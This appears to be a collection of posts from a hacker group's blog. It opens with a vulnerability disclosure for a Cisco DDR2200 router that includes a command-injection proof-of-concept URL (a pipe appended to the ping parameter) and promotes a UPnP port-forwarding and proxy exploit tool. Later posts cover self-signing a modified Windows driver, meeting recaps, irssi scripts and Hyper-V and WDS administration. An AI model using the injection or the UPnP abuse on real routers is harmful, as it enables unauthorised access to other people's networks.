Cisco DDR2200 ADSL2 Residential Gateway Router Vulnerabilities

I have discovered two Vulnerabilities in the Cisco DDR2200 ADSL2 Residential Gateway Router. The first vulnerability is that this device responds to UPNP multicast packets and UPNP SOAP requests out side of its local area network. Allowing attackers to forward ports and redirect traffic with out being authenticated, all of which can be exploited using dc414’s Upnp Exploiter.

The second vulnerability is remote command execution in the web based ping function. You can inject a pipe “|” followed by your command and it will get run on the shell and return the results as shown below.

Ping PoC: http://192.168.1.254/waitPingqry.cgi?showPingResult=1&pingAddr=127.0.0.1|ls

Screenshot from 2013-04-15 18:55:59

Upnp Exploiter

dc414 and I are proud to introduce Upnp Exploiter! A Upnp scanner and exploit tool. This tool comes with two main scanning functions and exploit functions.

The first scanning functions is the target scan. Here you can pick a single IP or IP range to find anything that reports back to a UPNP multicast packet sent to the normal UPNP broadcast address “239.255.255.250 on port 1900” If target responds it takes a closer look and sees if it can get the targets UPNP profile letting us know what type of device it is, what UPNP functions it supports, its IP, and other information. When used remotely, this all takes advantage of the fact that the target device violates the UPNP specs and responds to UPNP requests outside of the deices local area network.

The second scanning function only works in a local area network and just sends out a UPNP broadcast. This function is just using the UPNP protocol as intended.

Once a list of UPNP supported devices are found the script mines some information from it like device type, UPNP functions, IP. If its a gateway device it prompts you and asks if you want to attempt to exploit it.

The first option is to forward ports. If doing this LAN side its best to do some network recon with NMAP or something, find some fun services running on a internal server and forward them to the web for later hacking. While gathering information on the device it gets a list of other ports forwarded via UPNP and the devices internal IP. This is supper helpful when doing things on the remote side. One of my personal favs is routing the modems internal port 80 to 81 on WAN. This should give you access to the routers internal web UI for configuration. Most of the time the default creds will work for admin access >:)
This of course violates lots of rfc’s, protocols, and other stuff lol.

The second exploit option tries to turn a gateway device into a proxy. Now this works using IP addresses and one host per port. So if you want to connect to Victim A on port 8 you use the script to forward all data coming in on any port you choose “for now we will say 88” to VA on port 80. So you connect to port 88 on the Victim B “the gateway device” and all the traffic is forwarded to VA on port 80. This also breaks UPNP rules, but who cares.

The last little thing this script does is parse the replies for the unique_service_name() vulnerability and reports to you if it finds anything with some helpful information to aid in exploiting it.

You can get the script from the git page HERE. If you like it please consider donating to dc414 or me (Anarchy Angel – anarchy@new.dc414.org) for taking the time to make such an awesome script 🙂 If anyone would like to help with development please contact Anarchy Angel (me).

Many thanks to Ngharo for help with the regex and list stuff.

April meeting recap

Aprils meeting was awesome! Ngharo started us off with room introductions, which was helpful considering all the new faces at this meeting. Next I gave a quick demo of my new tool Upnp Exploiter. Which lead to me disclosing two 0day vulnerabilities in the Cisco DDR2200 ADSL2 Residential Gateway Router “expect more on all this later”! Then dw5304 gave his SNMP demo again and showed all the n00bs how to pwn Cisco routers using SNMP to upload a your own config to them. Then we all started messing around with trying to draw words on an oscilloscope with my arduino. Because of a late start that is all we had time for. Congrats to BigStarHero for winning a Emerson switch board in the free junk giveaway! Here is some pictures from the meeting.

Free junk giveaway big winner!

windows 8/server 2012 unsigned driver hell no more.

So I have this nice new computer that I built with a asus p9x79 motherboard. I wanted it to become a 2012 server for some stuff. After loading the OS I found out that the nic is “incompatible” seeing intel thinks that its a desktop board and should not be used in a server. I went looking though the inf file and found out that it was ignoring the hardware id’s.

[ControlFlags]
ExcludeFromSelect = \
PCI\VEN_8086&DEV_1502,\
PCI\VEN_8086&DEV_1503

Well this sucks…. lets fix it.

I then removed the exludefromselect and the two lines fallowing it.

went to install the modified driver and ended up with image

well at least I know its ok :). Now lets fix the catalog’s hash.

A hunt on google told me I needed inf2cat so lets download it here.

inf2cat /driver:”C:\Driver” /os:8_X64

My new catalog was created :).
went and tried installing my new driver once again and Damm :(… digital signature is missing wtf???? how the hell am I going to fix that I thought.

A little more searching found out we can make a self signed cert and attach it to a driver “he he”…. nice try Microsoft…..

So lets get this sucker signed. download here

makecert -r -n "CN=Intelnic" -pe -ss MyCertStore -sr LocalMachine

Now I needed to export this cert with its private key so we can import it into “Trusted Root CAs” and “Trusted Publishers” on my local machine I was creating the driver and also on the target machine I wanted to install my driver at :).

Now that we have it imported lets sign this sucker.
signtool sign /s MyCertStore /n "Intelnic" /t http://timestamp.verisign.com/scripts/timestamp.dll "C:\Driver\e1c63x64.cat"

Went back to my server installed the cert int trusted root cas and trusted publishers hey look my nic now works :).

it works

Thanks Microsoft for making a “secure” os that has to have drivers that are signed … but wait…. I just made it my self o well there went that idea….

March meeting madness!

The March meeting was no let down, we had lots of people and as always great demos. Ngharo got it started with a make your own pringles can cantenna. 9 luck attendees got to make and take home their own cantenna!  Then he kept it going with a quick demo of radio Mobile and how to use it to make a long range wireless mesh network. Then the professor gave a demo on metasploit using a java exploit to root a windows box. dw5304 took over and gave a little demo of a hacked xbox360 and using a laptop to control everything the console does. Here are some pictures from the meeting. Congrats to uberushaximus for winning 100 free hours to AOL high speed!!

bucketworks PA project

Earlier last week I ended up making a new pa system for Bucketworks. Now what most people will not realize is everything at Bucketworks is hacked to gather and this is no different. I was asked to make a low power radio system for notifying people within Bucketworks for people at the door and other uses, seeing we would need to file for an fcc licence i decided to go another route and the Bucketworks pa project was born.

during our wondering around at Bucketworks we (paul,eli,and I) have come across manly things one of them things was an old pa speaker and I got to thinking does it still work? I ended up wiring one up to an amp, we found in the basement along with a old audio mixer seen below after finding out we had a bad 1/4″ cable.

and low and behold it worked.
https://www.youtube.com/embed/Lehy4tTpVCg

The next step was to figure out where all the rest of the speakers were located and where to run the wires back to the server room where we were going to store the audio equipment. we ended up finding a total of 5 speakers wired them in and played some Pandora over the new pa system. I had to modify a cable to go from the “server” to the audio board.

I then set to making the Bucketworks pa bot. This bot is a windows client that logs in into an irc channel and organically just sent text to a text to speech function over the sound board. I expanded it to authenticate, noaa weather warnings, play music, tell the time and a few other functions.

After showing it to a few guys we ended up hearing this and we all started laughing.

and the Bucketworks pa project was complete.
If there is any interest i will upload the code if it is wanted.

Some awesome useful irssi scripts.

If you dont already know to use scripts you have to put any scripts in:

/home/< your_user >/.irssi/scripts/

And to load it into irssi use:

/script load < script_name.pl >

adv_windowlist.pl – If you have lots of windows open in irssi like me this script will make your life much easier. It adds a permanent advanced window list in a statusbar by default. You can configure it to put it on a sidebar if you like.

trackbar.pl – This little script will do just one thing: it will draw a line each time you switch away from a window. This way, you always know just up to where you’ve been reading that window 🙂 It also removes the previous drawn line, so you don’t see double lines.

nickcolor.pl – In channels with lots of activity, all nicks having the same old white color can get a little crazy, this script gives each user is own color and put a little organization to the chaos.

spell.pl – Spell check for irssi. This script takes a little setup. first you have to install Lingua::Ispell and Ispell using the following commands:

$ sudo apt-get install ispell liblingua-ispell-perl

It should pull in a number of other packages including a dictionary. I actually received an error as well, but it seems safe to ignore:

error in control file: `Index' value missing for format `info' at /usr/sbin/install-docs line 709, line 16.

Now load the script into irssi and bind Alt-s as a short cut to check the line you wish to send.
to bind Alt-s type the following into irssi:

/bind meta-s /_spellcheck

Also set the max guesses:

/set spell_max_guesses 3

Now your ready to use this script. After you type a message before you hit enter hit Alt-s and this script if you have any misspelled words and give you up to three guesses for correction.

Hyper-v User rights assignment

So if your like most admin’s you and have a bunch of Support staff some times its just easier to give them access to hyper-v then to have them wait for the admin to complete a simple task (ex.make a snapshot). The only issue with this is the fact they can do things we don’t want… for instance turn a machine off reboot change settings like nics along w/ creating new machines. So i went looking and apparently there is a way to restrict this so this post goes to show how we can.

Assigning Rights to hyper-v
Open mmc.exe

Click file then add/remote snap-in

Select authorization manager and hit add and ok

Then right click on Open Authorization Store….

Select XML file then hit browse

Goto \\Server_name\c$\ProgramData\Microsoft\Windows\Hyper-V\ and select InitialStore.xml

Then hit ok


Role Assignments
Select the Role we want to assign in this case its Administrator

Right click and click assign User and Groups then select from Windows and Active Directory…

Enter username you want to assign rights to. And hit ok

That user will now have admin rights.

Creating New Role Definitions
(what rights does this group have?)
Expand intialstore.xml -> Hyper-v services ->Definitions ->Role Definitions

Right click Role definitions and click new role Definitions

Then enter a name and click add…

Select Operations tab

Then add what rights you want that role to have by checking the checkbox and hitting ok, ok.

Now that we have a new role definitions created now we need to create role assignments see role assignments Section.

Role Assignments
Right click create new role assignment

Select what role that’s been defined

And hit ok

Now we need to add user into this group see Role Assignments

WDS Mananger on windows 8

Apparently Microsoft did not include WDS manager with there server 2012 RSAT (Remote Server Administration Tools) once again…
to enable remote wds control place the fallowing script in a batchfile and run batchfile.bat wdsservername

copy \\%1\c$\windows\system32\WdsMgmt.msc c:\windows\system32\WdsMgmt.msc
copy \\%1\c$\windows\system32\en-US\WdsMgmt.msc c:\windows\system32\en-US\WdsMgmt.msc
copy \\%1\c$\windows\system32\wdsmgmt.dll c:\windows\system32\wdsmgmt.dll
copy \\%1\c$\windows\system32\en-US\wdsmgmt.dll.mui c:\windows\system32\en-US\wdsmgmt.dll.mui
copy \\%1\c$\windows\system32\WdsImage.dll c:\windows\system32\WdsImage.dll
copy \\%1\c$\windows\system32\en-US\WdsImage.dll.mui c:\windows\system32\en-US\WdsImage.dll.mui
copy \\%1\c$\windows\system32\wdscsl.dll c:\windows\system32\wdscsl.dll
copy \\%1\c$\windows\system32\wdstptc.dll c:\windows\system32\wdstptc.dll
copy \\%1\c$\windows\system32\WdsTptMgmt.dll c:\windows\system32\WdsTptMgmt.dll
copy \\%1\c$\windows\system32\en-US\WdsTptMgmt.dll.mui c:\windows\system32\en-US\WdsTptMgmt.dll.mui
copy \\%1\c$\windows\system32\wdsmmc.dll c:\windows\system32\wdsmmc.dll
copy \\%1\c$\windows\system32\en-US\wdsmmc.dll.mui c:\windows\system32\en-US\wdsmmc.dll.mui
regsvr32 WdsMgmt.dll
regsvr32 WdsTptMgmt.dll
regsvr32 WdsMmc.dll

once you do its now possible to remotely manage wds servers in your network by typing WdsMgmt.msc in search.